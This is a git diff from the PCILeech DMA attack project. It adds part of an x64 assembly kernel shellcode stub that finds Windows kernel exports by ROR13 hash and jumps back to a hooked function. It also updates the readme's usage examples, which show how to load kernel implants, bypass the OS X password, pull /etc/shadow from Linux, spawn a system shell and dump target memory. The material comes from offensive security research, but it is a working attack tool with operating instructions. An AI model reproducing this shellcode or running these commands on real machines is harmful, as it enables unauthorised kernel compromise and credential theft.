+	ADD rsp, 040h
+	; ----------------------------------------------------
+	; RETRIEVE AND SET PHYSICAL ADDRESS
+	; ----------------------------------------------------
+	MOV [data_filler], 09h		; DEBUG
+	MOV rcx, r12
+	MOV edx, 5a326357h			; H_MmGetPhysicalAddress
+	CALL PEGetProcAddressH	
+	MOV rcx, r13
+	CALL rax
+	MOV [data_phys_addr_alloc], eax
+	; ----------------------------------------------------
+	; EXIT - RESTORE AND JMP BACK
+	; ----------------------------------------------------
+	MOV [data_filler], 08h		; DEBUG
+	skipcall:
+	ADD rsp, 020h
+	POP r13
+	POP r12
+	POP r11
+	POP r10
+	POP rdi
+	POP rsi
+	POP rbx
+	POP r9
+	POP r8
+	POP rdx
+	POP rcx
+	MOV rax, [data_orig_fnptr]
+	JMP rax
+main ENDP
+
+; ----------------------------------------------------
+; Perform ROR13 hashing
+; rcx -> string ptr
+; rax <- result
+; ----------------------------------------------------
+HashROR13A PROC
+	PUSH rsi
+	PUSH rdi
+	MOV rsi, rcx
+	XOR rdi, rdi
+	XOR rax, rax
+	CLD
+	hash_loop:
+	LODSB
+	TEST al, al
+	JZ hash_loop_finish
+	ROR edi, 13
+	ADD edi, eax
+	JMP hash_loop
+	hash_loop_finish:
+	MOV eax, edi
+	POP rdi
+	POP rsi
+	RET
+HashROR13A ENDP
+
+; ----------------------------------------------------
+; Search for PE header given an address. May cause page faults.
+; rcx -> scan address
+; rax <- header address
+; ----------------------------------------------------
+PEGetModuleFromAddress_ScanBack PROC
+	SHR rcx, 12
+	SHL rcx, 12
+	address_loop:
+	MOV eax, 1000h
+	SUB rcx, rax
+	MOV ax, [rcx]		; dos header magic
+	CMP ax, 5a4dh
+	JNE address_loop
+	MOV eax, [rcx+60]	; nt header address offset
+	CMP eax, 1000h
+	JNBE address_loop
+	ADD rax, rcx		; nt header address
+	MOV eax, [rax]
+	CMP eax, 00004550h	; nt header magic
+	JNE address_loop
+	MOV rax, rcx
+	RET
+PEGetModuleFromAddress_ScanBack ENDP
+
+; rcx -> module base address
+; rdx -> hash of exported function
+; rax <- address of exported function
+PEGetProcAddressH PROC
+	; rdi = PIMAGE_EXPORT_DIRECTORY
+	; rsi = counter NumberOfNames
+	PUSH rdi
+	PUSH rsi
+	MOV edi, [rcx+60]	; nt header address offset
+	MOV edi, [rdi+rcx+136]
+	ADD rdi, rcx		; ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress + hModule  
+	MOV r8d, [rdi+24]	; PIMAGE_EXPORT_DIRECTORY->NumberOfNames
+	XOR rsi, rsi
+	find_loop:
+	MOV eax, [rdi+32]			; PIMAGE_EXPORT_DIRECTORY->AddressOfNames
+	ADD rax, rcx				; PIMAGE_EXPORT_DIRECTORY->AddressOfNames + hModule
+	MOV eax, [rax+rsi*4]		; AddressOfNames[index]
+	ADD rax, rcx
+	PUSH rcx
+	MOV rcx, rax
+	CALL HashROR13A
+	POP rcx
+	CMP eax, edx
+	JE find_loop_found
+	INC rsi
+	JMP find_loop
+	find_loop_found:
+	; found!
+	MOV edx, [rdi+36]		; PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals
+	ADD rdx, rcx			; PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals + hModule
+	XOR rax, rax
+	MOV ax, [rdx+rsi*2]		; AddressOfNameOrdinals[index]
+	MOV edx, [rdi+28]		; PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions 
+	ADD rdx, rcx			; PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions + hModule
+	MOV eax, [rdx+rax*4]	; AddressOfFunctions[index]
+	ADD rax, rcx			; AddressOfFunctions[index] + hModule
+	POP rsi
+	POP rdi
+	RET
+PEGetProcAddressH ENDP
+
+END
diff --git a/readme.md b/readme.md
index 8613c2d..e6489c1 100644
--- a/readme.md
+++ b/readme.md
@@ -30,14 +30,14 @@ In order to turn the USB3380 development board into a PCILeech device it needs t
 
 NB! If flashing the PP3380 PCIe card the J3 jumper must be bridged to connect the EEPROM. This is not necessary for the USB3380-EVB mini-PCIe card.
 
-* cd /pathtofiles
-* make
+* ` cd /pathtofiles `
+* ` make `
 * [ insert USB3380 hardware into computer ]
-* insmod pcileech_flash.ko
+* ` insmod pcileech_flash.ko `
 
-The insmod command must be run as root. If compilation fails you might have to install dependencies before you try again. On debian based systems - such as debian, ubuntu and kali, run 'apt-get update && apt-get install gcc make linux-headers-$(uname -r)' and try again.
+The insmod command must be run as root. If compilation fails you might have to install dependencies before you try again. On debian based systems - such as debian, ubuntu and kali, run ` apt-get update && apt-get install gcc make linux-headers-$(uname -r) ` and try again.
 
-If module insertion is successful flashing is also successful. In order to activate the flashed PCILeech device it must be power-cycled. Re-inserting it in the computer will achieve this. If one wish to flash more devices then unload the pcileech_flash kernel module by issuing the command: 'rmmod pcileech_flash'. If there is an error flashing is unsuccessful. Please try again and check any debug error messages by issing the command: 'dmsg'.
+If module insertion is successful flashing is also successful. In order to activate the flashed PCILeech device it must be power-cycled. Re-inserting it in the computer will achieve this. If one wish to flash more devices then unload the pcileech_flash kernel module by issuing the command: ` rmmod pcileech_flash `. If there is an error flashing is unsuccessful. Please try again and check any debug error messages by issing the command: ` dmsg `.
 
 Installing PCILeech:
 ====================
@@ -49,7 +49,7 @@ The Google Android USB driver also needs to be installed. Download the Google An
 
 Generating Signatures:
 ======================
-PCILeech comes with built in signatures for Linux and OS X. For Windows 8.1 and higher two full pages of driver code is needed to hijack the kernel. In order to avoid copyright issues the end user has to generate these signatures by themselves using the pcileech_gensig.exe program. The user needs to point to a valid ntfs.sys file in order to generate a signature.
+PCILeech comes with built in signatures for Linux and OS X. For Windows 8.1 and higher two full pages of driver code is needed to hijack the kernel. In order to avoid copyright issues the end user has to generate these signatures by themselves using the pcileech_gensig.exe program. The user needs to point to a valid ntfs.sys file in order to generate a signature. Alternatively it is possible to use the unstable/experimental win10_x64 generic built-in signature.
 
 Capabilities:
 =============
@@ -69,7 +69,7 @@ Users should be able to extend PCILeech easily by writing own kernel shellcode m
 Limitations/Known Issues:
 =========================
 * Read and write errors on some older hardware. Try "pcileech.exe testmemreadwrite -min 0x1000" in order to test memory reads and writes against the physical address 0x1000 (or any other address) in order to confirm.
-* Does not work if the OS uses the IOMMU/VT-d. This is the default on OS X (unless disabled in recovery mode). Windows 10 Enterprise with Virtuallization based security features enabled does not work - this is however not the default setting in Windows 10.
+* Does not work if the OS uses the IOMMU/VT-d. This is the default on OS X (unless disabled in recovery mode). Windows 10 Enterprise with Virtuallization based security features enabled does not work fully - this is however not the default setting in Windows 10.
 * Some Linux kernels does not work. Sometimes a required symbol is not exported in the kernel and PCILeech fails.
 * Linux might also not work if some virtualization based features are enabled.
 * Windows Vista: some shellcode modules such as wx64_pscmd does not work.
@@ -78,25 +78,34 @@ Limitations/Known Issues:
 Examples:
 =========
 Load OS X kernel module:
-* pcileech.exe kmdload -kmd osx_x64
+* ` pcileech.exe kmdload -kmd osx_x64 `
 
 Remove OS X password requirement, requires that the KMD is loaded at an address. In this example 0x11abc000 is used.
-* pcileech.exe ax64_unlock -kmd 0x11abc000 -0 1
+* ` pcileech.exe ax64_unlock -kmd 0x11abc000 -0 1 `
 
 Retrieve the file /etc/shadow from a Linux system without pre-loading a KMD.
-* pcileech.exe lx64_filepull -kmd LINUX_X64 -s /etc/shadow -out c:\temp\shadow
+* ` pcileech.exe lx64_filepull -kmd LINUX_X64 -s /etc/shadow -out c:\temp\shadow `
+
+Show help for the lx64_filepull kernel implant.
+* ` pcileech.exe lx64_filepull -help `
 
 Load a kernel module into Windows Vista by using the default memory scan technique.
-* pcileech.exe kmdload -kmd winvistax64
+* ` pcileech.exe kmdload -kmd winvistax64 `
 
 Load a kernel module into Windows 10 by targeting the page table of the ntfs.sys driver signed on 2016-03-29.
-* pcileech.exe kmdload -kmd win10x64_ntfs_20160329 -pt
+* ` pcileech.exe kmdload -kmd win10x64_ntfs_20160329 -pt `
+
+Load a kernel module into Windows 10 (unstable/experimental). Compatible with VBS/VTL0 only if "Protection of Code Integrity" is not enabled.
+* ` pcileech.exe kmdload -kmd WIN10_X64 `
 
 Spawn a system shell on the target system (system needs to be locked and kernel module must be loaded). In this example the kernel module is loaded at address: 0x7fffe000.
-* pcileech.exe wx64_pscmd -kmd 0x7fffe000
+* ` pcileech.exe wx64_pscmd -kmd 0x7fffe000 `
+
+Show help for the dump command.
+* ` pcileech.exe dump -help `
 
 Dump all memory from the target system given that a kernel module is loaded at address: 0x7fffe000.
-* pcileech.exe dump -kmd 0x7fffe000
+* ` pcileech.exe dump -kmd 0x7fffe000 `
 
 Building:
 =========
@@ -107,8 +116,13 @@ Changelog:
 v1.0
 * Initial release.
 
-latest
-* New implant: load unsigned drivers into Windows kernel [wx64_driverload_svc].
-* Added firmware flash support without PLX SDK.
-* Added linux unlock signatures.
-* New kernel module signature [win10x64_ntfs_20160820].
+v1.1
+* core: help for actions and kernel implants.
+* core: search for signatures (do not patch).
+* core: signature support for wildcard and relative offsets in addition to fixed offsets.
+* implant: load unsigned drivers into Windows kernel [wx64_driverload_svc].
+* signature: generic Windows 10 (Unstable/Experimental) [win10_x64].
+* signature: Windows 10 updated.
+* signature: Linux unlock added.
+* other: firmware flash support without PLX SDK.
+* other: various bug fixes.